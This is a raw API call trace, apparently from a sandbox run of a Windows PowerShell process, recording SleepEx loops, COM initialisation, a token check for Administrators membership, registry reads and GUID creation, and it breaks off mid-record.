[0276.036] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0279.824] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0279.849] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0279.852] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0279.871] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0279.917] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0279.937] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0279.938] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0279.959] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.001] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.001] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.004] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.017] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.105] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.144] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.183] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.256] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.277] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.278] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.279] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.322] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.347] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.348] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.357] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.365] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.368] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.381] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.394] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.412] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.459] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.499] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.521] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.569] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.644] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.646] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.681] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.776] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.794] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.795] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.799] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.800] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.812] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.829] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.835] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.841] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.854] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.862] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.872] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.880] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.884] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.895] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0280.916] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.358] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.372] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.375] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.398] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.437] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.445] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.446] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.487] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.508] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.520] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.550] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.564] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.602] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.650] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.690] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.774] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.850] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.884] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.932] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0302.983] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.033] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.050] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.103] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.109] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0303.165] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.466] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.484] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.487] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.506] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.542] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.567] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.568] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.595] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.630] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.630] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.633] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.645] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.668] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.679] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.775] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.810] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.845] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.850] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.901] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.914] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.914] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.915] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.950] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.982] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0304.984] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.382] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.447] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.450] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.463] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.506] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.510] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.511] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.546] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.555] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.569] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.584] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.593] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.626] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.671] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.712] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.780] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.815] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.817] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.818] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.819] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.822] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.823] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.847] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.890] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0306.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.984] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0307.997] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.000] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.013] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.062] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.065] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.066] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.115] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.136] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.149] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.175] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.179] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.187] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.220] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.304] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.304] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.305] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.349] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.364] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.366] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.375] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.381] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.383] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.398] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0308.443] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.512] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.525] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.527] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.547] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.584] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.591] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.592] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.643] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.662] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.674] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.693] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.706] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.789] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.857] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.884] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.920] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.986] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.991] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.992] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0309.999] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.003] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.005] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.020] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.020] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0310.021] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.545] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.558] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.562] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.578] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.613] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.617] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.618] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.668] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.678] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.690] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.710] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.719] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.755] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.856] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.904] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.923] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.924] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.925] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.966] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0311.995] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.000] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.001] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.003] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.007] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0312.009] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0313.913] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0313.932] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0313.935] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0313.956] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0313.992] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.006] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.007] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.045] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.063] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.077] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.102] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.106] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.114] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.150] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.187] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.241] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.251] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.252] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.252] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.293] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.307] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.308] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.312] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.317] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0314.318] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 Thread: id = 65 os_tid = 0xdd8 Thread: id = 66 os_tid = 0x85c Thread: id = 67 os_tid = 0x8f0 Thread: id = 68 os_tid = 0x56c [0240.857] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0240.857] CoGetContextToken (in: pToken=0x6fbfa04 | out: pToken=0x6fbfa04) returned 0x0 [0240.857] CObjectContext::QueryInterface () returned 0x0 [0240.857] CObjectContext::GetCurrentThreadType () returned 0x0 [0240.857] Release () returned 0x0 [0240.857] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x1 [0240.857] CoUninitialize () [0240.858] RoInitialize () returned 0x1 [0240.858] RoUninitialize () returned 0x0 [0240.858] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0240.940] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0241.066] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0241.126] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0241.175] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0241.222] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0241.276] GetCurrentProcess () returned 0xffffffff [0241.277] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x6fbf540 | out: TokenHandle=0x6fbf540*=0x60c) returned 1 [0241.281] GetTokenInformation (in: TokenHandle=0x60c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x6fbf544 | out: TokenInformation=0x0, ReturnLength=0x6fbf544) returned 0 [0241.282] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6d33dd8 [0241.282] GetTokenInformation (in: TokenHandle=0x60c, TokenInformationClass=0x8, TokenInformation=0x6d33dd8, TokenInformationLength=0x4, ReturnLength=0x6fbf544 | out: TokenInformation=0x6d33dd8, ReturnLength=0x6fbf544) returned 1 [0241.283] LocalFree (hMem=0x6d33dd8) returned 0x0 [0241.284] DuplicateTokenEx (in: hExistingToken=0x60c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x6fbf54c | out: phNewToken=0x6fbf54c*=0x620) returned 1 [0241.285] CheckTokenMembership (in: TokenHandle=0x620, SidToCheck=0x49974c8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x6fbf55c | out: IsMember=0x6fbf55c) returned 1 [0241.285] CloseHandle (hObject=0x620) returned 1 [0241.380] CoTaskMemAlloc (cb=0x804) returned 0x6d14ae0 [0241.380] GetConsoleTitleW (in: lpConsoleTitle=0x6d14ae0, nSize=0x400 | out: lpConsoleTitle="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x3a [0241.803] CoTaskMemFree (pv=0x6d14ae0) [0241.942] CoTaskMemAlloc (cb=0x804) returned 0x6d14a60 [0241.942] GetConsoleTitleW (in: lpConsoleTitle=0x6d14a60, nSize=0x400 | out: lpConsoleTitle="C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x3a [0242.023] CoTaskMemFree (pv=0x6d14a60) [0242.025] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0242.107] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.175] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.206] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.210] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.269] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.347] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.441] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.488] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.534] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.581] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.628] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.675] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.722] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.769] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.816] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.862] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.909] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0242.958] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0243.035] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0243.081] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0243.129] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0243.175] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0243.222] SleepEx (dwMilliseconds=0x0, bAlertable=0) returned 0x0 [0243.313] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x6fbf38c | out: phkResult=0x6fbf38c*=0x680) returned 0x0 [0243.314] RegQueryValueExW (in: hKey=0x680, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x6fbf3ac, lpData=0x0, lpcbData=0x6fbf3a8*=0x0 | out: lpType=0x6fbf3ac*=0x1, lpData=0x0, lpcbData=0x6fbf3a8*=0x56) returned 0x0 [0243.314] RegQueryValueExW (in: hKey=0x680, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x6fbf3ac, lpData=0x4a2b5a4, lpcbData=0x6fbf3a8*=0x56 | out: lpType=0x6fbf3ac*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x6fbf3a8*=0x56) returned 0x0 [0243.314] RegCloseKey (hKey=0x680) returned 0x0 [0243.783] GetTimeZoneInformation (in: lpTimeZoneInformation=0x6fbf15c | out: lpTimeZoneInformation=0x6fbf15c) returned 0x2 [0243.787] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x6fbe9d0, nSize=0x80 | out: lpBuffer="က澪က澪") returned 0x0 [0243.788] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x42378d60, Data2=0xd3dd, Data3=0x43ed, Data4=([0]=0x8c, [1]=0xe4, [2]=0x3b, [3]=0x22, [4]=0x97, [5]=0x22, [6]=0x7d, [7]=0x0))) returned 0x0 [0244.027] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x2afe8a80, Data2=0x5404, Data3=0x47a4, Data4=([0]=0xa8, [1]=0x2b, [2]=0xa3, [3]=0x1a, [4]=0xee, [5]=0x57, [6]=0x71, [7]=0x7a))) returned 0x0 [0244.032] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xda2c536d, Data2=0xef7, Data3=0x46d0, Data4=([0]=0xa6, [1]=0x88, [2]=0xaa, [3]=0x19, [4]=0x78, [5]=0x79, [6]=0x85, [7]=0xb))) returned 0x0 [0244.034] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xdf48e58f, Data2=0x1bd5, Data3=0x4945, Data4=([0]=0x80, [1]=0x48, [2]=0xb1, [3]=0xc1, [4]=0xef, [5]=0x65, [6]=0xa0, [7]=0x25))) returned 0x0 [0244.040] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x7575ea6a, Data2=0x3761, Data3=0x4906, Data4=([0]=0x9a, [1]=0x49, [2]=0xf9, [3]=0x3d, [4]=0x8, [5]=0xe9, [6]=0xdd, [7]=0xd7))) returned 0x0 [0244.042] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xb1c9a128, Data2=0x7fe, Data3=0x42b1, Data4=([0]=0x86, [1]=0xc4, [2]=0x3a, [3]=0xdc, [4]=0xf6, [5]=0x30, [6]=0x6e, [7]=0xc5))) returned 0x0 [0244.046] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xa617c7f5, Data2=0x2f53, Data3=0x4dff, Data4=([0]=0x97, [1]=0xc5, [2]=0xd9, [3]=0xd4, [4]=0xd6, [5]=0x45, [6]=0x9f, [7]=0x36))) returned 0x0 [0244.058] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x997df749, Data2=0x9b4b, Data3=0x4faa, Data4=([0]=0xae, [1]=0x73, [2]=0x70, [3]=0x63, [4]=0x50, [5]=0xdd, [6]=0xcf, [7]=0xf))) returned 0x0 [0244.144] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x16cc93db, Data2=0xf5b4, Data3=0x4a77, Data4=([0]=0x84, [1]=0xcb, [2]=0xaf, [3]=0x5f, [4]=0x86, [5]=0xad, [6]=0x7e, [7]=0x4d))) returned 0x0 [0244.144] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xaf3ed98, Data2=0xba50, Data3=0x4fe2, Data4=([0]=0xa3, [1]=0xda, [2]=0xc8, [3]=0x1e, [4]=0xbe, [5]=0x61, [6]=0x84, [7]=0xe7))) returned 0x0 [0244.148] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xa91478a8, Data2=0xe0e8, Data3=0x48cf, Data4=([0]=0x86, [1]=0x83, [2]=0xcd, [3]=0xb3, [4]=0x28, [5]=0xd4, [6]=0x65, [7]=0x58))) returned 0x0 [0244.153] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x7314828b, Data2=0xf978, Data3=0x4f22, Data4=([0]=0xba, [1]=0x5, [2]=0xbe, [3]=0x13, [4]=0x79, [5]=0xc6, [6]=0xab, [7]=0xd))) returned 0x0 [0244.160] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xe51d6b0c, Data2=0x3fef, Data3=0x454b, Data4=([0]=0xa0, [1]=0xd, [2]=0xb0, [3]=0xa1, [4]=0xc1, [5]=0x64, [6]=0x2f, [7]=0x37))) returned 0x0 [0244.161] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x78313d7, Data2=0x39f, Data3=0x48f8, Data4=([0]=0x89, [1]=0x45, [2]=0xae, [3]=0xdf, [4]=0xd5, [5]=0xe0, [6]=0xaa, [7]=0x8b))) returned 0x0 [0244.166] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x7b658eba, Data2=0x2425, Data3=0x4ac9, Data4=([0]=0xba, [1]=0x86, [2]=0xd1, [3]=0x76, [4]=0x45, [5]=0x3e, [6]=0x24, [7]=0x33))) returned 0x0 [0244.166] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0x7f6e3934, Data2=0xf282, Data3=0x443b, Data4=([0]=0x8c, [1]=0x45, [2]=0x25, [3]=0x5e, [4]=0x33, [5]=0xdb, [6]=0x63, [7]=0xa5))) returned 0x0 [0244.172] CoCreateGuid (in: pguid=0x6fbf224 | out: pguid=0x6fbf224*(Data1=0xb87a4f79, Data2=0x56d4, 